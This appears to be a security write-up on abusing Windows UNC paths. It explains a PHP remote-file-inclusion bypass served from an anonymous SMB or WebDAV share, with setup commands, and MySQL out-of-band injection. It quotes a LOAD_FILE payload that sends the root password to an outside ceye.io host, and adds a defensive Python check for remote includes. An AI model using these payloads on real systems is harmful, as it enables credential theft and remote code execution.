The Microsoft Windows UNC
The Microsoft Windows UNC, short for Universal Naming Convention or Uniform Naming Convention, specifies a common syntax to describe the location of a network resource, such as a shared file, directory, or printer. The UNC syntax for Windows systems has the generic form:
\\ComputerName\SharedFolder\Resource
Some Microsoft Windows interfaces also allow or require UNC syntax for WebDAV share access, rather than a URL. The UNC syntax is extended with optional components to denote the use of SSL and a TCP/IP port number, so that a WebDAV URL of the form http[s]://HostName[:Port]/SharedFolder/Resource becomes:
\\HostName[@SSL][@Port]\SharedFolder\Resource
Vul1: Exploiting RFI in PHP Bypass Remote URL Inclusion Restriction
Overview
Via. http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html
A few days ago an article circulated on Twitter about exploiting remote file inclusion (RFI) in PHP applications and bypassing the remote URL inclusion restriction. This is a clever trick.
In the PHP configuration file, the allow_url_include directive is set to "Off" by default, which instructs PHP not to load remote HTTP or FTP URLs and thus prevents remote file inclusion attacks. However, PHP does not block loading from SMB URLs even when both "allow_url_include" and "allow_url_fopen" are set to "Off".
This trick exploits a characteristic of Windows UNC paths. Attack chain: UNC -> SMB -> DATA.
Besides SMB, an unauthenticated WebDAV share can also be used.
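As an added example (not code from the original post), here is a small Python parser for both the plain UNC form and the extended WebDAV form shown above, together with the check an application should apply to anything that reaches include(): with allow_url_include off, PHP already refuses scheme-prefixed URLs, so the UNC case is the one the application itself has to catch. The hostnames and file names in the sample run are constructed, except for the share path that the SMB section below uses.

```python
import re

# Extended UNC form from the text, with either slash style accepted since
# PHP on Windows treats "\\" and "//" alike:
#   \\HostName[@SSL][@Port]\SharedFolder\Resource
_UNC_RE = re.compile(
    r"^[\\/]{2}(?P<host>[^\\/@]+)(?P<ssl>@SSL)?(?:@(?P<port>\d{1,5}))?"
    r"[\\/](?P<share>[^\\/]+)(?:[\\/](?P<resource>.*))?$",
    re.IGNORECASE,
)
_SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def parse_unc(path):
    """Split a UNC path into its parts; return None if `path` is not UNC."""
    m = _UNC_RE.match(path.strip())
    if m is None:
        return None
    host, share = m.group("host"), m.group("share")
    ssl = m.group("ssl") is not None
    port = int(m.group("port")) if m.group("port") else None
    resource = (m.group("resource") or "").replace("\\", "/")
    tail = f"/{share}" + (f"/{resource}" if resource else "")
    if ssl or port is not None:
        # @SSL / @Port mark the WebDAV form: http[s]://HostName[:Port]/...
        kind = "webdav"
        url = ("https" if ssl else "http") + f"://{host}"
        url += (f":{port}" if port else "") + tail
    else:
        kind, url = "smb", f"smb://{host}" + tail
    return {"kind": kind, "host": host, "ssl": ssl, "port": port,
            "share": share, "resource": resource, "url": url}


def is_remote_include(arg):
    """True if an include()/require() argument names a remote resource:
    a wrapper URL (http://, ftp://, ...) or any UNC path.  Run it on the
    exact, already URL-decoded string that would reach include()."""
    arg = arg.strip()
    return bool(_SCHEME_RE.match(arg)) or parse_unc(arg) is not None


if __name__ == "__main__":
    # Sample inputs: the first is the post's own share path, the rest are constructed.
    for p in (r"\\192.168.0.111\ethan\filename",
              r"\\dav.example.invalid@SSL@8443\1\2.txt",
              "//host/share/file", "pages/home.php"):
        print(f"{p!r:45} remote={is_remote_include(p)} {parse_unc(p)}")
```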
SMB
Configure a Samba server with anonymous read access (on a Linux machine).
On Kali Linux, install Samba with the following command:
apt-get install samba
Create the SMB share directory:
mkdir /var/www/html/pub/
Set permissions on the newly created SMB share directory:
chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/
Run the following command to remove the default content of the Samba config file:
echo > /etc/samba/smb.conf
Put the following content in /etc/samba/smb.conf:
[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes
[ethan]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody
Now restart the Samba server to apply the new configuration specified in /etc/samba/smb.conf:
service smbd restart
Once the Samba server has restarted successfully, access the SMB share and make sure the server does not ask for credentials:
\\192.168.0.111\ethan\filename
WebDAV
Start a WebDAV service with Docker:
Use https://github.com/BytemarkHosting/docker-webdav. Just put the result file in /root/WebDAV/data, but a username and password are required. :(
docker run -v /root/webdav:/var/lib/dav -e USERNAME=admin -e PASSWORD=admin -p 8000:80 --rm --name webdav bytemark/webdav
Alternatively, use https://github.com/idelsink/webdav-docker:
docker run --name=webdav -d -v /root/webdav:/webdav -p 8000:80 idelsink/webdav
The Windows WebDAV client relies on the WebClient service (enabled by default). To access a WebDAV service through a UNC path, the service has to be started first.
Note: the Windows WebClient converts the requested WebDAV path to uppercase, while Apache matches paths case-sensitively by default. This was discovered from the log file: the uppercased path is rejected outright with a 403.
Using purely numeric paths and file names avoids this problem.
Vul2: MySQL OOB Injection
Overview
Via. https://osandamalith.com/2017/02/03/mysql-out-of-band-hacking
Out-of-band injection uses alternative channels to extract data from the server: HTTP(S) requests, DNS resolutions, file systems, e-mails, etc., depending on the functionality of the back-end technology.
From the payloads provided by CEYE, it can be seen that OOB injection is well researched for MSSQL and Oracle, but for MySQL and PostgreSQL it is limited. The payload CEYE provides for MySQL is:
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));
Note that there are a lot of backslashes (\).
Note: this also exploits the characteristics of Windows UNC paths.
Limitations
The --secure-file-priv option sets the secure_file_priv system variable, which limits the effect of data import and export operations, such as those performed by the LOAD DATA and SELECT ... INTO OUTFILE statements and the LOAD_FILE() function. When the variable names a directory, LOAD_FILE() can only read files inside that directory, so a UNC path is refused; when it is NULL, LOAD_FILE() is disabled altogether. Reference: https://dev.mysql.com/doc/refman/5.7/en/server-options.html
| Property | Value |
|---|---|
| Command-Line Format | --secure-file-priv=dir_name |
| System Variable | secure_file_priv |
| Scope | Global |
| Dynamic | No |
| Type | String |
| Default Value (>= 5.7.6) | platform specific |
| Default Value (<= 5.7.5) | empty string |
| Valid Values (>= 5.7.6) | empty string, dirname, NULL |
| Valid Values (<= 5.7.5) | empty string, dirname |